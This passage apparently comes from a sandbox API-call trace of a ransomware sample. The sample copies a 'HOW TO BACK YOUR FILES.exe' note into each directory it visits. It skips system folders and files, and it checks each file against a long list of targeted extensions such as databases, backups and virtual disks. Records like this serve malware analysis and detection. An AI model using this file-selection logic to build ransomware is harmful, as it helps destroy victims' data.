lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0079.269] CloseHandle (hObject=0x120) returned 1 [0079.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0079.269] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0079.269] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0079.269] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0079.270] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0079.270] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0079.270] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.270] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0079.270] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0079.270] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0079.270] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0079.270] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c231540, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0079.270] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0079.270] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0079.270] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0079.270] lstrlenW (lpString="packages") returned 8 [0079.270] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*") returned 85 [0079.270] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="packages" | out: lpString1="packages") returned="packages" [0079.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0079.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x319090 [0079.270] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2548 [0079.270] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0079.270] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0079.270] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0079.270] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0079.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319090 | out: hHeap=0x2b0000) returned 1 [0079.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0079.271] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned 92 [0079.271] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0079.271] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0079.271] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0079.271] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.271] GetLastError () returned 0x0 [0079.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0079.272] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0079.272] CloseHandle (hObject=0x120) returned 1 [0079.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0079.272] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0079.272] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0079.272] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0079.272] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0079.272] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0079.272] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.272] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0079.272] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0079.272] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0079.272] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0079.272] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c231540, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0079.272] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0079.272] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="aoldtz.exe") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="windows") returned -1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="bootmgr") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="temp") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="pagefile.sys") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="boot") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ids.txt") returned 1 [0079.272] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ntuser.dat") returned 1 [0079.273] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="perflogs") returned 1 [0079.273] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="MSBuild") returned 1 [0079.273] lstrlenW (lpString="vcRuntimeMinimum_x86") returned 20 [0079.273] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*") returned 94 [0079.273] lstrcpyW (in: lpString1=0x2cce4ba, lpString2="vcRuntimeMinimum_x86" | out: lpString1="vcRuntimeMinimum_x86") returned="vcRuntimeMinimum_x86" [0079.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0079.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe4) returned 0x2c8eb8 [0079.273] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2548 [0079.273] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0079.273] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0079.273] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0079.273] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0079.273] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0079.273] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0079.273] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned 113 [0079.273] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0079.273] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0079.273] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0079.274] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.274] GetLastError () returned 0x0 [0079.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0079.274] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0079.274] CloseHandle (hObject=0x120) returned 1 [0079.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0079.274] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0079.274] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0079.274] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0079.274] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0079.274] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0079.274] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.275] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0079.275] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0079.275] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e8b00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd15e8b00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd15e8b00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x13babb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0079.275] lstrlenW (lpString="cab1.cab") returned 8 [0079.275] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*") returned 115 [0079.275] lstrcpyW (in: lpString1=0x2cce4e4, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0079.275] lstrlenW (lpString="cab1.cab") returned 8 [0079.275] lstrlenW (lpString="Ares865") returned 7 [0079.275] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0079.275] lstrlenW (lpString=".dll") returned 4 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0079.275] lstrlenW (lpString=".lnk") returned 4 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0079.275] lstrlenW (lpString=".ini") returned 4 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0079.275] lstrlenW (lpString=".sys") returned 4 [0079.275] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0079.275] lstrlenW (lpString="cab1.cab") returned 8 [0079.275] lstrlenW (lpString="bak") returned 3 [0079.275] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0079.275] lstrlenW (lpString="ba_") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0079.276] lstrlenW (lpString="dbb") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0079.276] lstrlenW (lpString="vmdk") returned 4 [0079.276] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0079.276] lstrlenW (lpString="rar") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0079.276] lstrlenW (lpString="zip") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0079.276] lstrlenW (lpString="tgz") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0079.276] lstrlenW (lpString="vbox") returned 4 [0079.276] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0079.276] lstrlenW (lpString="vdi") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0079.276] lstrlenW (lpString="vhd") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0079.276] lstrlenW (lpString="vhdx") returned 4 [0079.276] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0079.276] lstrlenW (lpString="avhd") returned 4 [0079.276] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0079.276] lstrlenW (lpString="db") returned 2 [0079.276] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0079.276] lstrlenW (lpString="db2") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0079.276] lstrlenW (lpString="db3") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0079.276] lstrlenW (lpString="dbf") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0079.276] lstrlenW (lpString="mdf") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0079.276] lstrlenW (lpString="mdb") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0079.276] lstrlenW (lpString="sql") returned 3 [0079.276] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0079.276] lstrlenW (lpString="sqlite") returned 6 [0079.276] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0079.276] lstrlenW (lpString="sqlite3") returned 7 [0079.277] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0079.277] lstrlenW (lpString="sqlitedb") returned 8 [0079.277] lstrlenW (lpString="xml") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0079.277] lstrlenW (lpString="$er") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0079.277] lstrlenW (lpString="4dd") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0079.277] lstrlenW (lpString="4dl") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0079.277] lstrlenW (lpString="^^^") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0079.277] lstrlenW (lpString="abs") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0079.277] lstrlenW (lpString="abx") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0079.277] lstrlenW (lpString="accdb") returned 5 [0079.277] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0079.277] lstrlenW (lpString="accdc") returned 5 [0079.277] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0079.277] lstrlenW (lpString="accde") returned 5 [0079.277] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0079.277] lstrlenW (lpString="accdr") returned 5 [0079.277] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0079.277] lstrlenW (lpString="accdt") returned 5 [0079.277] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0079.277] lstrlenW (lpString="accdw") returned 5 [0079.277] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0079.277] lstrlenW (lpString="accft") returned 5 [0079.277] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0079.277] lstrlenW (lpString="adb") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0079.277] lstrlenW (lpString="adb") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0079.277] lstrlenW (lpString="ade") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0079.277] lstrlenW (lpString="adf") returned 3 [0079.277] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0079.278] lstrlenW (lpString="adn") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0079.278] lstrlenW (lpString="adp") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0079.278] lstrlenW (lpString="alf") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0079.278] lstrlenW (lpString="ask") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0079.278] lstrlenW (lpString="btr") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0079.278] lstrlenW (lpString="cat") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0079.278] lstrlenW (lpString="cdb") returned 3 [0079.278] 